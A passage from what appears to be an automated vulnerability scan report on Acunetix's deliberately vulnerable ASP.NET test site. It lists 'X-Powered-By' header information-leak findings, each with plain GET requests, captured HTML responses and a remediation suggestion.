align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        20. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 17888
          
          
          Response body (17888 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8=" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLEirm5BAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+L5/dFSm3qL6WSrtXoxMhBWz78mQ==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        21. GET http://testaspnet.vulnweb.com/robots.txt
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (222 bytes)
          GET http://testaspnet.vulnweb.com/robots.txt HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (245 bytes)
          HTTP/1.1 200 OK
          Content-Type: text/plain
          Last-Modified: Mon, 06 May 2019 12:46:42 GMT
          Accept-Ranges: bytes
          ETag: "b0b05ac194d51:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:16 GMT
          Content-Length: 13
          
          
          Response body (13 bytes)
          User-agent: *
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        22. GET http://testaspnet.vulnweb.com/rssFeed.aspx
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (316 bytes)
          GET http://testaspnet.vulnweb.com/rssFeed.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (220 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/xml; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 2118
          
          
          Response body (2118 bytes)
          
          <rss version="2.0">
                <channel>
                  <title>Acunetix testaspnet</title>
                  <link>http://testaspnet.acunetix.com/</link>
                  <description>
                    This is the syndication feed for testaspnet.acunetix.com.
                  </description>
          
                  <item>
                    <title>Acunetix Vulnerability Scanner Now With Network Security Scans</title>
                    <description>
                       Seamless OpenVAS integration now also available on Windows and Linux
                    </description>
                    <link>
                       http://testaspnet.acunetix.com/ReadNews.aspx?id=0
                    </link>
                    <author>admin                    </author>
                    <pubDate>
                       Thu, 16 May 2019 12:32:30 GMT
                     </pubDate>
                  </item>
            
                  <item>
                    <title>Acunetix Web Vulnerability Scanner beta released!</title>
                    <description>
                       26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.
                    </description>
                    <link>
                       http://testaspnet.acunetix.com/ReadNews.aspx?id=3
                    </link>
                    <author>admin                    </author>
                    <pubDate>
                       Tue, 08 Nov 2005 11:37:35 GMT
                     </pubDate>
                  </item>
            
                  <item>
                    <title>Web attacks - can your web applications withstand the force?</title>
                    <description>
                       21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.
                    </description>
                    <link>
                       http://testaspnet.acunetix.com/ReadNews.aspx?id=2
                    </link>
                    <author>admin                    </author>
                    <pubDate>
                       Tue, 08 Nov 2005 11:35:22 GMT
                     </pubDate>
                  </item>
            
                </channel>
              </rss>  
            
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        23. GET http://testaspnet.vulnweb.com/Signup.aspx
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (315 bytes)
          GET http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 12954
          
          
          Response body (12954 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Signup</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Signup.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx+i81I" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" />
